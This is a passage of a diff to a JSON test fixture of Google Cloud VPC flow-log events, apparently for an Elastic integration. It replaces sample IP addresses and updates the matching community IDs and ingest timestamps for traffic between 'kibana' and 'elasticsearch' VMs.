"number": 15169 }, - "address": "198.51.100.107", + "address": "67.43.156.14", "port": 59790, - "ip": "198.51.100.107" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -12191,7 +12191,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:2VaSImZuAKUa2JwnaG4ATyMe4g0=", + "community_id": "1:tW5o1L9SEuS4pptFcAjo5fF6q5w=", "bytes": 1784, "transport": "tcp", "type": "ipv4", @@ -12206,7 +12206,7 @@ "related": { "ip": [ "10.87.40.76", - "198.51.100.107" + "67.43.156.14" ] }, "gcp": { @@ -12230,8 +12230,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868874600Z", - "original": "{\"insertId\":\"ptjoddfhmrhg8\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"198.51.100.107\",\"dest_port\":59790,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391826900Z", + "original": "{\"insertId\":\"ptjoddfhmrhg8\",\"jsonPayload\":{\"bytes_sent\":\"1784\",\"connection\":{\"dest_ip\":\"67.43.156.14\",\"dest_port\":59790,\"protocol\":6,\"src_ip\":\"10.87.40.76\",\"src_port\":5601},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"end_time\":\"2019-06-14T03:40:50.702194466Z\",\"packets_sent\":\"7\",\"reporter\":\"SRC\",\"rtt_msec\":\"36\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:50.590894439Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:50.590894439Z", "end": "2019-06-14T03:40:50.702194466Z", @@ -12252,10 +12252,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33552, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12269,7 +12269,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:r7WME9xMisADgziCEygFYe5e1kY=", + "community_id": "1:RgpWxKDKI4bxYgUqX3Z0ZpipsO4=", "bytes": 209716, "name": "default", "transport": "tcp", @@ -12292,7 +12292,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -12328,8 +12328,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868878Z", - "original": "{\"insertId\":\"ptjoddfhmrhgf\",\"jsonPayload\":{\"bytes_sent\":\"209716\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"262\",\"reporter\":\"SRC\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391830200Z", + "original": "{\"insertId\":\"ptjoddfhmrhgf\",\"jsonPayload\":{\"bytes_sent\":\"209716\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33552,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:55.213081491Z\",\"packets_sent\":\"262\",\"reporter\":\"SRC\",\"rtt_msec\":\"21\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:06.075957044Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:06.075957044Z", "end": "2019-06-14T03:49:55.213081491Z", @@ -12350,10 +12350,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33556, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12367,7 +12367,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:S6achMS1ovFuI9FmGgW49nTJQXk=", + "community_id": "1:VN7YV4epNl2EJKRguZ3Rx7ylmok=", "bytes": 165643, "name": "default", "transport": "tcp", @@ -12390,7 +12390,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -12426,8 +12426,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868881300Z", - "original": "{\"insertId\":\"ptjoddfhmrhgg\",\"jsonPayload\":{\"bytes_sent\":\"165643\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"256\",\"reporter\":\"SRC\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391834400Z", + "original": "{\"insertId\":\"ptjoddfhmrhgg\",\"jsonPayload\":{\"bytes_sent\":\"165643\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33556,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"256\",\"reporter\":\"SRC\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", "end": "2019-06-14T03:49:59.565214145Z", @@ -12450,9 +12450,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65257, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12466,7 +12466,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:DqikX2/VHNCo3K4Z/FQLlk5o8C4=", + "community_id": "1:IOiOyU4WA7IZikjr7eAoksKW7Mw=", "bytes": 65890, "transport": "tcp", "type": "ipv4", @@ -12481,7 +12481,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -12505,8 +12505,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868884500Z", - "original": "{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391839400Z", + "original": "{\"insertId\":\"ptjoddfhmrhgb\",\"jsonPayload\":{\"bytes_sent\":\"65890\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65257,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220614265Z\",\"packets_sent\":\"593\",\"reporter\":\"SRC\",\"rtt_msec\":\"220\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:39:59.403388091Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:39:59.403388091Z", "end": "2019-06-14T03:49:56.220614265Z", @@ -12533,18 +12533,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33538, "bytes": 62620, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 358 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:NoAWHdeVVE/1VjCAle3M10HSrH0=", + "community_id": "1:ZH1or4RA5RqLjC/iRPmayKRTLeA=", "bytes": 62620, "name": "default", "transport": "tcp", @@ -12566,7 +12566,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -12603,8 +12603,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868887800Z", - "original": "{\"insertId\":\"ptjoddfhmrhgs\",\"jsonPayload\":{\"bytes_sent\":\"62620\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391844200Z", + "original": "{\"insertId\":\"ptjoddfhmrhgs\",\"jsonPayload\":{\"bytes_sent\":\"62620\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33538},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565124617Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"250\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:01.074952616Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:01.074952616Z", "end": "2019-06-14T03:49:59.565124617Z", @@ -12625,10 +12625,10 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33692, "domain": "kibana", - "ip": "203.0.113.134" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12642,7 +12642,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:ICaRxvQCM8Iv02SAaUpscf0dmFk=", + "community_id": "1:JliXl736rywggK/Xuo92yo5WPuY=", "bytes": 185520, "name": "default", "transport": "tcp", @@ -12665,7 +12665,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.134" + "67.43.156.13" ] }, "gcp": { @@ -12701,8 +12701,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868891200Z", - "original": "{\"insertId\":\"ptjoddfhmrhge\",\"jsonPayload\":{\"bytes_sent\":\"185520\",\"connection\":{\"dest_ip\":\"203.0.113.134\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391849600Z", + "original": "{\"insertId\":\"ptjoddfhmrhge\",\"jsonPayload\":{\"bytes_sent\":\"185520\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":33692,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"dest_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565137912Z\",\"packets_sent\":\"249\",\"reporter\":\"SRC\",\"rtt_msec\":\"181\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.558259934Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.558259934Z", "end": "2019-06-14T03:49:59.565137912Z", @@ -12725,9 +12725,9 @@ "as": { "number": 33652 }, - "address": "203.0.113.58", + "address": "67.43.156.13", "port": 65262, - "ip": "203.0.113.58" + "ip": "67.43.156.13" }, "source": { "address": "10.139.99.242", @@ -12741,7 +12741,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RtfThXVVNPvXxMgtvtqlB4QmIlQ=", + "community_id": "1:0ZkH0evnSSMhLkKCLL1Ehnorl9s=", "bytes": 33269, "transport": "tcp", "type": "ipv4", @@ -12756,7 +12756,7 @@ "related": { "ip": [ "10.139.99.242", - "203.0.113.58" + "67.43.156.13" ] }, "gcp": { @@ -12777,8 +12777,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868894400Z", - "original": "{\"insertId\":\"ptjoddfhmrhgc\",\"jsonPayload\":{\"bytes_sent\":\"33269\",\"connection\":{\"dest_ip\":\"203.0.113.58\",\"dest_port\":65262,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"517\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391853100Z", + "original": "{\"insertId\":\"ptjoddfhmrhgc\",\"jsonPayload\":{\"bytes_sent\":\"33269\",\"connection\":{\"dest_ip\":\"67.43.156.13\",\"dest_port\":65262,\"protocol\":6,\"src_ip\":\"10.139.99.242\",\"src_port\":9200},\"dest_location\":{\"asn\":33652,\"city\":\"Broomfield\",\"continent\":\"America\",\"country\":\"usa\",\"region\":\"Colorado\"},\"end_time\":\"2019-06-14T03:49:56.220741828Z\",\"packets_sent\":\"517\",\"reporter\":\"SRC\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:00.251430011Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:00.251430011Z", "end": "2019-06-14T03:49:56.220741828Z", @@ -12805,18 +12805,18 @@ "as": { "number": 15169 }, - "address": "203.0.113.134", + "address": "67.43.156.13", "port": 33556, "bytes": 58811, "domain": "kibana", - "ip": "203.0.113.134", + "ip": "67.43.156.13", "packets": 358 }, "tags": [ "preserve_original_event" ], "network": { - "community_id": "1:S6achMS1ovFuI9FmGgW49nTJQXk=", + "community_id": "1:VN7YV4epNl2EJKRguZ3Rx7ylmok=", "bytes": 58811, "name": "default", "transport": "tcp", @@ -12838,7 +12838,7 @@ }, "related": { "ip": [ - "203.0.113.134", + "67.43.156.13", "10.139.99.242" ] }, @@ -12875,8 +12875,8 @@ } }, "event": { - "ingested": "2021-06-09T10:48:29.868897700Z", - "original": "{\"insertId\":\"ptjoddfhmrhg7\",\"jsonPayload\":{\"bytes_sent\":\"58811\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"203.0.113.134\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", + "ingested": "2021-12-09T13:37:46.391858400Z", + "original": "{\"insertId\":\"ptjoddfhmrhg7\",\"jsonPayload\":{\"bytes_sent\":\"58811\",\"connection\":{\"dest_ip\":\"10.139.99.242\",\"dest_port\":9200,\"protocol\":6,\"src_ip\":\"67.43.156.13\",\"src_port\":33556},\"dest_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"elasticsearch\",\"zone\":\"us-east1-b\"},\"dest_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"end_time\":\"2019-06-14T03:49:59.565214145Z\",\"packets_sent\":\"358\",\"reporter\":\"DEST\",\"rtt_msec\":\"133\",\"src_instance\":{\"project_id\":\"my-sample-project\",\"region\":\"us-east1\",\"vm_name\":\"kibana\",\"zone\":\"us-east1-b\"},\"src_location\":{\"asn\":15169,\"continent\":\"America\",\"country\":\"usa\"},\"src_vpc\":{\"project_id\":\"my-sample-project\",\"subnetwork_name\":\"default\",\"vpc_name\":\"default\"},\"start_time\":\"2019-06-14T03:40:03.062674441Z\"},\"logName\":\"projects/my-sample-project/logs/compute.googleapis.com%2Fvpc_flows\",\"receiveTimestamp\":\"2019-06-14T03:50:15.857334727Z\",\"resource\":{\"labels\":{\"location\":\"us-east1-b\",\"project_id\":\"my-sample-project\",\"subnetwork_id\":\"758019854043528829\",\"subnetwork_name\":\"default\"},\"type\":\"gce_subnetwork\"},\"timestamp\":\"2019-06-14T03:50:15.857334727Z\"}", "kind": "event", "start": "2019-06-14T03:40:03.062674441Z", "end": "2019-06-14T03:49:59.565214145Z", @@ -12897,10 +12897,10 @@ "as": { "number": 15169 }, - "address": "198.51.100.248", + "address": "67.43.156.14", "port": 9200, "domain": "elasticsearch", - "ip": "198.51.100.248" + "ip": "67.43.156.14" }, "source": { "address": "10.87.40.76", @@ -12914,7 +12914,7 @@ "preserve_original_event" ], "network": { - "community_id": "1:RJ5OB/OF2Dh8aqt0X5ikvUiYbOE=", + "community_id": "1:OhbIPr/28Fsp+gsHSdoT+T8vBZA=", "bytes": 5220, "name": "default", "transport": 